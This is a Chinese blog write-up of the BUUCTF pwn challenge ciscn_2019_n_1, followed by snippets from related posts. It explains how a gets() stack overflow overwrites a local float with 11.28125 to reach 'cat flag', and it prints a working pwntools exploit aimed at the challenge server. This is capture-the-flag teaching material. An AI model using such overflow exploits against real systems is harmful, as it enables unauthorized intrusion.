BUUCTF Pwn ciscn_2019_n_1 1

已于 2022-11-08 12:12:39 修改
阅读量333 收藏 2
点赞数 1
分类专栏: CTF 文章标签: 安全 python
于 2022-11-08 12:11:00 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_45200829/article/details/127747735
版权

记录BUUCTF的一道题,运行文件,提示我们输入一个数字,
说是必须是11.28125,但实际输入11.28125也不行

在这里插入图片描述
拖入IDA看看,
在这里插入图片描述
逻辑很简单,只要v2等于11.28125就能cat flag
但貌似v2我们并不能控制。
但实际上是可以的,

我们看到gets获取输入存到了v1,很明显的栈溢出
v1在rbp-30h的位置,v2在rbp-4h的位置,溢出以后我们就可以用自己的数据覆盖v2。

从ida可以看到v1长44,十六进制就是2C
也可以用0x30-0x4=2C

payload就是 2C个字长 + 11.28125

上代码

from pwn import *
p=remote("node4.buuoj.cn",25971)
pyload=b"A"*0x2c+p64(0x41348000)
p.sendafter(".",pyload)
p.interactive()

0x41348000是11.28125在内存中的16进制表示,推荐一个在线转换的网站:https://tooltt.com/floatconverter/

在这里插入图片描述

在这里插入图片描述

不搞渗透的程序员不是好逆向工程师
关注
  • 1
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
BUUCTFciscn_2019_n_1 1
qq_41560595的博客
09-24 4292
这道题是栈溢出题型,又不同于一般的栈溢出,在此做个总结。 查看权限 拖入IDA,F5可用函数 解题思路:这道题的意思是输入字符串v1,判断v2。考虑输入长字符串覆盖到存储v2的内存空间,把v2的值改掉。 因此,覆盖0x30-0x4=44个字节给v1,另外4个字节给v2 由于v2数值在内存以16进制存储,所以,找到11.28125的16进制值。 存在两个比较指令,双击进去。 0x41348000就是16进制的11.28125。 编写脚本 from pwn import * p=remote('
ciscn_2019_n_3
12-30
ciscn(全国大学生信息安全竞赛),2019年的一道题目,涉及到fastbin堆漏洞的利用。由于调用了system函数,所以漏洞利用的难度不大,推荐初学者练习。题解链接:...
PWN学习记录(4)BUUCTF-ciscn_2019_n_1
m0_58824086的博客
08-05 133
下载题目得到ciscn_2019_n_1,利用 file 命令查看该文件的类型,再通过checksec ./filename查看保护机制。将文件放入IDA查看,打开字符串窗口。没有发现 /bin/sh,但找到了cat flag.txt。打开终端,输入vim 1.py 创建一个python文件(命名随意)NX enabled如果这个保护开启就是意味着栈数据没有执行权限。将exp文件输入进1.py,Esc+:wq保存并退出1.py。双击cat flag.text。打开main,F5反编译。
BUUCTF刷题之路-ciscn_2019_n_11
qq_30528603的博客
05-27 178
非常简单的逻辑,类似于一个猜数字游戏,猜对了弹出flag,失败了还贴心的告诉你可能值。我们要做的就是修改v2变量的内容,让他等于11.28125。这次我们不需要覆盖返回地址只需要改v2的值就好了。接着我们算一下偏移【rbp-30h-rbp+4h】得到偏移为44个字节。意思就是说我们在44个字节之后填入11.28125覆盖v2的值就能使if语句成立。题目只开启了堆栈不可执行。无非就是不能在栈上执行shellcode无伤大雅。
BUUCTF-ciscn_2019_n_1 (新手pwner的成长日记4)
最新发布
weixin_58410275的博客
04-27 555
NX不可执行,其余保护没有开启,shellcode方法不可用,不过没关系,这个题考点不在这里。
[BUUCTF-PWN] ciscn_2019_n_1
m0_46098032的博客
01-04 263
下载文件,checksec看一下。 用IDA64打开文件,找到main函数,F5查看。 双击进去func函数。 输入的数传给v1,但是需要使v2=11.28125才能获得flag。我们查看一下v1和v2的栈信息。 因此我们可以利用gets先覆盖到v2的部分,再跟上11.28125十六进制数即可成功获取flag。 11.28125的16进制为0x41348000。 exp如下: from pwn import * p = remote('node4.buuoj.cn',
BUUCTF ciscn_2019_n_1
RookieMOR的博客
05-14 615
1.下载文件,用checksec一下: 2.用IDA64查看,进入func函数: 当v2=11.28125时获得flag,但只有v1的输入,没有v2输入。因为有一个gets函数,点击v1,v2可以知道,v1与v2差44个字节,可以通过输入v1的值去改变v2的值,实现栈溢出。 查看汇编可以看到有一个uconiss的比较指令,把xmm0与cs:dword_4007F4,由movss可以知道xmme0是v1或v2的值,那么点击dword_4007F4 看到一个 dd ,百度一下可以知道,.
ciscn-2019-pwn
11-29
【标题】"ciscn-2019-pwn"是一个与网络安全竞赛相关的主题,尤其聚焦于"Pwn"类别,这通常指的是破解或利用程序漏洞来获取系统控制权的挑战。2019年的CISCN国互联网安全大会)可能是这个挑战的背景,它是一个汇集...
your_pwn ciscn 2019 第十二届全国大学生信息安全竞赛
04-22
pwn赛题之your_pwn ciscn 2019 第十二届全国大学生信息安全竞赛
ciscn_2021_silverwolf.zip
05-18
2021第十四届全国大学生信息安全竞赛pwn题。
ciscn_2021_game
06-23
2021年国赛的pwn题,虚拟机类型的题目,分析起来比较有难度。
BUUCTF ciscn_2019_n_1 1
qq_56313338的博客
09-10 187
可以通过溢出v2来覆盖v1的值从而获取flag首先v1是浮点数11.28125的二进制是0x413480。
[BUUCTF-pwn]——ciscn_2019_n_1
Y_peak的博客
01-31 927
[BUUCTF-pwn]——ciscn_2019_n_1 [BUUCTF-pwn]——ciscn_2019_n_1思路一 —— 覆盖局部变量思路二 —— 覆盖返回地址 题目地址:https://buuoj.cn/challenges#ciscn_2019_n_1 题目: 老规矩下载下来后,在Linux上checksec一下,64位,并且没有开启栈保护,意味着我们可以利用栈溢出 在IDA看一下,main函数里面没有什么可以利用的 双击func函数看看,就是我们想要的。 思路一 —— 覆盖局部变量
[BUUCTF]PWN------ciscn_2019_n_1
BangSen1的博客
01-16 264
ciscn_2019_n_1 例行检查,64bit,NX保护开启 运行一下,没有信息 64位IDA打开,看到了cat flag ,跟进瞧瞧 函数显示 ,当v2等于11.28125时,得到flag,但要求 我们输入的是v1,所以我们只有把v1和v2 之间全部填满之后紧接着写入11.28125即可。 我们可以看到这两个之间的大小为0x2C 再将11.28125转换为内存的16进制,结果为 0x41348000 摘自 exp 得到FLAG ...
BUU刷题-Pwn-ciscn_2019_n_1
一个啥也不会的小菜鸡!
06-23 104
在rodate段,可以找到11.28125十六进制表示形式为0x41348000h。要将V2变为11.28125,必须知道11.28125十六进制表示形式。利用栈溢出覆盖v2改变其值,获得flag。[[双精度浮点数存储]]
以题目:ciscn_2019_n_1来详细学习dbg和pwntools
WdIg-2023的博客
01-21 1083
我们在做Linux平台下的pwn题目的时候,调试是必不可少的一步,在调试的过程找到漏洞并用pwntools写出攻击脚本。
ciscn_2019_n_1
zip471642048的博客
01-20 322
ciscn_2019_n_1 日常checksec一下,nice 程序是64位然后什么都没有开,非常好 ida64位打开程序,在frame_dummy函数处发现溢出,很明显我们只需溢出到v2把他的值覆盖掉成11.28125就过关了 我们可以通过用v1减去v2的值来计算溢出的距离0x30-0x4,然后把11.28125转换成在内存对应的16进制输入就ak了 from pwn import * io = remote('redirect.do-not-trust.hacking.run', 10072)
三种方式搞定buuctfciscn_2019_n_1
weixin_54452942的博客
03-26 609
三种方法解ciscn_2019_n_1,简单易懂,走过路过不要错过
BUUCTF-ciscn_2019_ne_51
Rt1Text的博客
10-09 233
根据文件名可知是other shellcode。
buuctf pwn 第五空间决赛pwn5
09-28
buuctf pwn 第五空间决赛pwn5是一个CTF pwn题,它涉及到格式化字符串漏洞。格式化字符串漏洞是一种常见的安全漏洞,利用这个漏洞可以读取或修改程序的内存的数据,从而导致程序行为异常或者攻击者获取敏感信息。在这个题目,攻击者可以通过构造特定的输入来修改程序的变量,进而获取shell权限。具体的payload可以参考引用和引用的代码示例。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值